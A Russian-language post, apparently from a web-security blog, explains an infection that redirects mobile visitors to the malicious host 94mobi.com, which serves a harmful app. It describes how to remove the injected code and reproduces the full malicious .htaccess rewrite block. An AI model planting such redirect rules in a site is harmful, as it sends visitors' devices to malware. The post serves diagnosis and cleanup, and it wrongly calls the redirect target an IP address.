Переадресация или редирект на вирусный сайт mobi.com
Переадресация или редирект на вирусный сайт mobi.com, если на сайт войти с помощью браузера или устройства из поиска, например с планшета, мобильного телефона, смартфона. Сама переадресация, как правило, находится в htacces, либо в другом исполняемый php файле движка. Вследствие деятельности подобных вирусов, владельцы сайтов полностью теряют посещения с мобильных устройств.
После того как посетитель попал на зараженный сайт с мобильного устройства, у него начинается загрузка вредоносного мобильного приложения, причём именно того, которое предназначено для заражения устройств этого типа.
При заходе на сайт с компьютера или ноутбука через браузер, выдается сообщение:
«Внимание! Обнаружена проблема! Сайт содержит вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.»
Проблема решается удаление вредоносного окда в файле htacces или шаблоне.
Код, который содержался в файле htaccess:
Как можно заметить, в коде вируса идет перечисление устройств и операционных систем для которых будет применятся редирект на другой сайт. Например для symbian, iphone, pocket book, mobile, pda, psp, Android и т.д.
- RewriteEngine on
- RewriteCond %{HTTP_ACCEPT} «text/vnd.wap.wml|application/vnd.wap.xhtml+xml» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «wapp|wapr|webc|winw|winw|xda|xda-» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «up.browser|up.link|windowssce|iemobile|mini|mmp» [NC,OR]
- RewriteCond %{HTTP_USER_AGENT} «symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android» [NC]
- RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
- RewriteCond %{HTTP_USER_AGENT} !america [NC]
- RewriteCond %{HTTP_USER_AGENT} !avant [NC]
- RewriteCond %{HTTP_USER_AGENT} !download [NC]
- RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
- RewriteRule ^(.*)$ http://94mobi.com/ [L,R=302]
В последней строке содержится IP-адрес сайта, который дальше перенаправляет на сайт. При этом доменное имя сайта периодически изменяется, например 39mobi.com, чуть позже сменилось на 94mobi.com.